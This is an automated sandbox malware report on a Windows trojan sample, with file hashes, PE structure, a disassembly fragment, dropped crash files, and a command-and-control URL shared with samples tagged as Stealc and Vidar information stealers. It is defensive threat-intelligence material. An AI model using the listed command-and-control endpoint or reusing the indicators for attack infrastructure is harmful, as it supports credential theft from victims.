                      http://62.122.184.144i$OW2Pw3W81N.exe, 00000000.00000002.2254974020.00000000006FE000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://62.122.184.144OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmp, OW2Pw3W81N.exe, 00000000.00000002.2254974020.00000000006FE000.00000004.00000020.00020000.00000000.sdmptrueunknown
                        http://62.122.184.144/f88d87a7e087e100.php3OW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000076C000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://62.122.184.144/f88d87a7e087e100.phpcOW2Pw3W81N.exe, 00000000.00000002.2255052204.000000000076C000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            62.122.184.144
                            unknownunknown
                            49120GORSET-ASRUtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1530565
                            Start date and time:2024-10-10 09:07:29 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 30s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:OW2Pw3W81N.exe
                            renamed because original name is a hash value
                            Original Sample Name:e75f8e807dc1f52a4ea99ce19f8d9e9f.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@2/5@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 23
                            • Number of non-executed functions: 166
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 13.89.179.12
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            03:08:42API Interceptor1x Sleep call for process: WerFault.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            62.122.184.144mJXdkcP4Wx.exeGet hashmaliciousStealcBrowse
                            • 62.122.184.144/f88d87a7e087e100.php
                            ttFpxuMwKz.exeGet hashmaliciousStealcBrowse
                            • 62.122.184.144/f88d87a7e087e100.php
                            gMkw55jZRs.exeGet hashmaliciousStealcBrowse
                            • 62.122.184.144/f88d87a7e087e100.php
                            QmMKz5d4j7.exeGet hashmaliciousStealcBrowse
                            • 62.122.184.144/f88d87a7e087e100.php
                            c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                            • 62.122.184.144/f88d87a7e087e100.php
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            GORSET-ASRUmJXdkcP4Wx.exeGet hashmaliciousStealcBrowse
                            • 62.122.184.144
                            ttFpxuMwKz.exeGet hashmaliciousStealcBrowse
                            • 62.122.184.144
                            gMkw55jZRs.exeGet hashmaliciousStealcBrowse
                            • 62.122.184.144
                            QmMKz5d4j7.exeGet hashmaliciousStealcBrowse
                            • 62.122.184.144
                            c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                            • 62.122.184.144
                            1.exeGet hashmaliciousRedLineBrowse
                            • 62.122.184.51
                            zJO55iLN3G.elfGet hashmaliciousUnknownBrowse
                            • 31.40.39.14
                            4VOPmuZZVV.exeGet hashmaliciousGoBrutBrowse
                            • 62.122.184.95
                            0Rae7oghna.elfGet hashmaliciousMiraiBrowse
                            • 46.173.48.47
                            PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                            • 62.122.190.121
                            No context
                            No context
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9626797680512231
                            Encrypted:false
                            SSDEEP:384:9IxKFxJiBXeykB20RjT7zuiFfY4IO89Jn:KGdykBPjvzuiFfY4IO8
                            MD5:E7685C5FBFB4400400AFA2AB767AC040
                            SHA1:99CA7E033C5ECB04ADD08F1030832268E7C3F0F5
                            SHA-256:195E2AB51A25051985EB0DD8DC01DFC7C576ECC5397989D63AA34C995D1B46C8
                            SHA-512:962F9E2B26586EBCBA4CE2E9BFFB87089ADC760E3681FCB145BA3AE865A46583C976B1A4BADEB330644E499154887D70EC52FA447C4387440179B7A3F6701D57
                            Malicious:true
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.7.7.0.6.4.3.8.8.4.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.0.1.7.7.0.6.8.1.3.8.5.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.9.b.5.0.1.a.-.2.1.c.f.-.4.4.b.4.-.b.4.b.c.-.b.6.4.7.b.8.2.3.f.7.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.1.1.c.d.4.b.-.b.3.8.c.-.4.9.3.d.-.9.9.c.3.-.5.9.2.1.7.f.f.f.f.3.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.O.W.2.P.w.3.W.8.1.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.3.4.-.0.0.0.1.-.0.0.1.4.-.f.9.0.4.-.5.b.3.2.e.3.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.8.e.5.a.b.1.c.6.f.9.c.7.f.4.f.f.3.0.8.4.8.7.1.6.6.a.5.1.3.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.3.7.f.4.4.8.1.4.b.4.2.6.0.b.0.7.a.9.d.1.3.f.f.4.9.1.3.6.1.9.1.1.3.e.4.d.3.a.9.!.O.W.2.P.w.3.W.8.1.N...e.x.e.....T.a.r.g.e.t.A.p.p.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:08:26 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):65007
                            Entropy (8bit):2.141319423761942
                            Encrypted:false
                            SSDEEP:384:Tw1SCRROOmfLhZvyVXJ71kI0Y9b9QJNG/XrGAI:s1vRROOkhkVXJRkda/XDI
                            MD5:FC79BBC385FAB1ADFE18FF3855C542F9
                            SHA1:EBFC8661E7ADC72B60E6E3756FD4C205E76C7AC2
                            SHA-256:0363A9FCE80DBEADFCE0E1FFCDD858BAEBB5F4C6C18DC78CBC3AFF3A1D7F0F25
                            SHA-512:79994663C2DDC5FAF2D4E98A900B22D3E4C4F92F76E920E998269ED6DCBAD362C0DFA2E5B9F149FA9E7C06B8D31F78B71561BE1CA1888C47C3CF24009F09419E
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... .......j}.g............4...............<.......T....*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T.......4...h}.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8336
                            Entropy (8bit):3.700865861252405
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJtE8666YEIcSU9OQm1LgmfPRldvyPpD+89bdisfH/m:R6lXJt/666YEzSU9OQm1LgmfPzlgdhfe
                            MD5:E3E9568CDE744FC87504A9F1656F453B
                            SHA1:953B17C126CC0ADBF0DDE2C9FFBAB2069CBFE47C
                            SHA-256:FDA6F0EAB8A3E6498E800D882E372B18C423476FAD6948E8110462DBA4005BBC
                            SHA-512:B30360BED8312FD4447C9906BD8FAA819293B6E6455B395E95B9E710C8A2660314AEAE62190BF70C1754A3CC8CCFA16C851BF2AC3D9287C5360E2F6581A88CA2
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.4.8.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4579
                            Entropy (8bit):4.4819796106445375
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsHJg77aI9OPiYrWpW8VY8Ym8M4JgkFZ+q8At278N9rd:uIjfpI7MPi57VgJ1v2IN9rd
                            MD5:734F6F1D0CA0204DD9BC8847C731AC31
                            SHA1:18930C956E0192214FB7D21FF69B35BD4DFF7115
                            SHA-256:05E84530A4FE59348CC070D5FA837A76D1BACA42C1353507D1625BB65E98D29E
                            SHA-512:E4BD57BFE97A0B4C79057F107B66B6527969C9B5ED8AF0E7CC3215EFCB967378035C4E5BB198A3266A0CFC794EA8BE4F979595C3D00AD740BC31923595D3564C
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537011" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.421570868670417
                            Encrypted:false
                            SSDEEP:6144:lSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNE0uhiTwu:svloTMW+EZMM6DFyG03wu
                            MD5:0AC26A3DB059B18812B5CA8889CED2D0
                            SHA1:942B160FE1F1C9F4C8374AAD1EE83AAA3199CAB8
                            SHA-256:E336DACE2C95DABDA0142182AC706CCDB12ED78EB606D92DBDCCB2FB38682A4A
                            SHA-512:6A25667627151D35FA27995C06244D6F099750424D9F0EDCF7848CCF008D2D500A3DB7B93551226BDD93FC6E000FEA5127F715840DE720AD93819AA340469235
                            Malicious:false
                            Reputation:low
                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2.q3................................................................................................................................................................................................................................................................................................................................................w.f.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.479560171069623
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:OW2Pw3W81N.exe
                            File size:468'480 bytes
                            MD5:e75f8e807dc1f52a4ea99ce19f8d9e9f
                            SHA1:337f44814b4260b07a9d13ff4913619113e4d3a9
                            SHA256:3339f2291951c0b62f885df33512216aa80f98cf73b93fc6c21c3314d68b4cb6
                            SHA512:b0db79ea8d47cb7fcc81fbbabcfe5a1cc4d000c30220795017ef1b01f219b28437065c62c09697070daef586ed1535af7f0b63175e0b6ce0f55869b0de64e0de
                            SSDEEP:12288:IbIpqMm713d2W3cbd98rJyiUm8ff/ZJ3ON2:tY7zpcb/8I7R/ZIk
                            TLSH:F8A4BF02A299EEB2F59146338D1EE6E4B56DF850DF0967DF33846A7F19312E1C632311
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L..Q-..Q-..Q-..O.,.H-..O.=.|-..O.:.&-..v...\-..Q-...-..O.3.P-..O.-.P-..O.(.P-..RichQ-..........................PE..L....n.d...
                            Icon Hash:51214945454d610d
                            Entrypoint:0x4402c5
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x648D6EFC [Sat Jun 17 08:29:48 2023 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:2f55e27b71ad52ab5e8947ebd770f2c7
                            Instruction
                            call 00007F664CE91850h
                            jmp 00007F664CE8BFEEh
                            mov edi, edi
                            push ebp
                            mov ebp, esp
                            push ecx
                            push ebx
                            mov eax, dword ptr [ebp+0Ch]
                            add eax, 0Ch
                            mov dword ptr [ebp-04h], eax
                            mov ebx, dword ptr fs:[00000000h]
                            mov eax, dword ptr [ebx]
                            mov dword ptr fs:[00000000h], eax
                            mov eax, dword ptr [ebp+08h]
                            mov ebx, dword ptr [ebp+0Ch]
                            mov ebp, dword ptr [ebp-04h]
                            mov esp, dword ptr [ebx-04h]
                            jmp eax
                            pop ebx
                            leave
                            retn 0008h
                            pop eax
                            pop ecx
                            xchg dword ptr [esp], eax
                            jmp eax
                            pop eax
                            pop ecx
                            xchg dword ptr [esp], eax
                            jmp eax
                            pop eax
                            pop ecx
                            xchg dword ptr [esp], eax
                            jmp eax
                            mov edi, edi
                            push ebp
                            mov ebp, esp
                            push ecx
                            push ecx
                            push ebx
                            push esi
                            push edi
                            mov esi, dword ptr fs:[00000000h]
                            mov dword ptr [ebp-04h], esi
                            mov dword ptr [ebp-08h], 00440341h
                            push 00000000h
                            push dword ptr [ebp+0Ch]
                            push dword ptr [ebp-08h]
                            push dword ptr [ebp+08h]
                            call 00007F664CE9C362h
                            mov eax, dword ptr [ebp+0Ch]
                            mov eax, dword ptr [eax+04h]
                            and eax, FFFFFFFDh
                            mov ecx, dword ptr [ebp+0Ch]
                            mov dword ptr [ecx+04h], eax
                            mov edi, dword ptr fs:[00000000h]
                            mov ebx, dword ptr [ebp-04h]
                            mov dword ptr [ebx], edi
                            mov dword ptr fs:[00000000h], ebx
                            pop edi
                            pop esi
                            pop ebx
                            leave
                            retn 0008h
                            push ebp
                            mov ebp, esp
                            sub esp, 08h
                            push ebx
                            push esi
                            push edi
                            cld
                            mov dword ptr [ebp-04h], eax
                            xor eax, eax
                            push eax
                            push eax
                            push eax
                            push dword ptr [ebp-04h]
                            push dword ptr [ebp+14h]
                            push dword ptr [ebp+10h]
                            push dword ptr [ebp+0Ch]
                            push dword ptr [ebp+08h]
                            call 00007F664CE8C1F3h
                            Programming Language:
                            • [ASM] VS2008 build 21022
                            • [C++] VS2008 build 21022
                            • [ C ] VS2008 build 21022
                            • [IMP] VS2005 build 50727
                            • [RES] VS2008 build 21022
                            • [LNK] VS2008 build 21022
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x515f00x8c.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000x18038.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25e0000x131c.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x5167c0x1c.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3aff00x40.text
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x224.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x512740x51400e11cbce9b67375a9f4a042c5457198acFalse0.7034945913461539OpenPGP Public Key6.996753547393799IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0x530000x11e180x6400f73042a906ffb61843869707ca245cc0False0.0906640625data1.220775048507969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .yapovi0x650000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .facajel0x660000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0x670000x1f60380x18200046151daa6246809604c4778438b688eFalse0.42101481541450775data4.976375612779056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x25e0000x213a0x22003f0795e8e7fe0b2cf5933867ad8a42d3False0.4612821691176471data4.574933300950145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_CURSOR0x7a1600x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                            RT_CURSOR0x7a4900x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                            RT_CURSOR0x7a5e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                            RT_CURSOR0x7b4900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                            RT_CURSOR0x7bd380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                            RT_CURSOR0x7c2d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                            RT_CURSOR0x7d1780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                            RT_CURSOR0x7da200x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                            RT_ICON0x678e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3694029850746269
                            RT_ICON0x678e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3694029850746269
                            RT_ICON0x687880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4553249097472924
                            RT_ICON0x687880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4553249097472924
                            RT_ICON0x690300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4619815668202765
                            RT_ICON0x690300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4619815668202765
                            RT_ICON0x696f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
                            RT_ICON0x696f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
                            RT_ICON0x69c600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2682572614107884
                            RT_ICON0x69c600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2682572614107884
                            RT_ICON0x6c2080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.3074577861163227
                            RT_ICON0x6c2080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.3074577861163227
                            RT_ICON0x6d2b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3599290780141844
                            RT_ICON0x6d2b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3599290780141844
                            RT_ICON0x6d7800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5660980810234542
                            RT_ICON0x6d7800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5660980810234542
                            RT_ICON0x6e6280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5487364620938628
                            RT_ICON0x6e6280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5487364620938628
                            RT_ICON0x6eed00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6163294797687862
                            RT_ICON0x6eed00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6163294797687862
                            RT_ICON0x6f4380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46307053941908716
                            RT_ICON0x6f4380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46307053941908716
                            RT_ICON0x719e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.48686679174484054
                            RT_ICON0x719e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.48686679174484054
                            RT_ICON0x72a880x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.49508196721311476
                            RT_ICON0x72a880x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.49508196721311476
                            RT_ICON0x734100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.44858156028368795
                            RT_ICON0x734100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.44858156028368795
                            RT_ICON0x738e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3742004264392324
                            RT_ICON0x738e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3742004264392324
                            RT_ICON0x747880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5171480144404332
                            RT_ICON0x747880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5171480144404332
                            RT_ICON0x750300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6059907834101382
                            RT_ICON0x750300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6059907834101382
                            RT_ICON0x756f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
                            RT_ICON0x756f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                            RT_ICON0x75c600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.487551867219917
                            RT_ICON0x75c600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.487551867219917
                            RT_ICON0x782080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5060975609756098
                            RT_ICON0x782080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5060975609756098
                            RT_ICON0x792b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4860655737704918
                            RT_ICON0x792b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4860655737704918
                            RT_ICON0x79c380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5390070921985816
                            RT_ICON0x79c380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5390070921985816
                            RT_DIALOG0x7e2180x58data0.8977272727272727
                            RT_STRING0x7e2700x2c2dataTamilIndia0.48441926345609065
                            RT_STRING0x7e2700x2c2dataTamilSri Lanka0.48441926345609065
                            RT_STRING0x7e5380x242dataTamilIndia0.4982698961937716
                            RT_STRING0x7e5380x242dataTamilSri Lanka0.4982698961937716
                            RT_STRING0x7e7800x620dataTamilIndia0.4343112244897959
                            RT_STRING0x7e7800x620dataTamilSri Lanka0.4343112244897959
                            RT_STRING0x7eda00x292dataTamilIndia0.4817629179331307
                            RT_STRING0x7eda00x292dataTamilSri Lanka0.4817629179331307
                            RT_ACCELERATOR0x7a1180x48dataTamilIndia0.8472222222222222
                            RT_ACCELERATOR0x7a1180x48dataTamilSri Lanka0.8472222222222222
                            RT_GROUP_CURSOR0x7a5c00x22data1.0294117647058822
                            RT_GROUP_CURSOR0x7c2a00x30data0.9375
                            RT_GROUP_CURSOR0x7df880x30data0.9375
                            RT_GROUP_ICON0x738780x68dataTamilIndia0.7019230769230769
                            RT_GROUP_ICON0x738780x68dataTamilSri Lanka0.7019230769230769
                            RT_GROUP_ICON0x6d7180x68dataTamilIndia0.6826923076923077
                            RT_GROUP_ICON0x6d7180x68dataTamilSri Lanka0.6826923076923077
                            RT_GROUP_ICON0x7a0a00x76dataTamilIndia0.6779661016949152
                            RT_GROUP_ICON0x7a0a00x76dataTamilSri Lanka0.6779661016949152
                            RT_VERSION0x7dfb80x260data0.5345394736842105
                            DLLImport
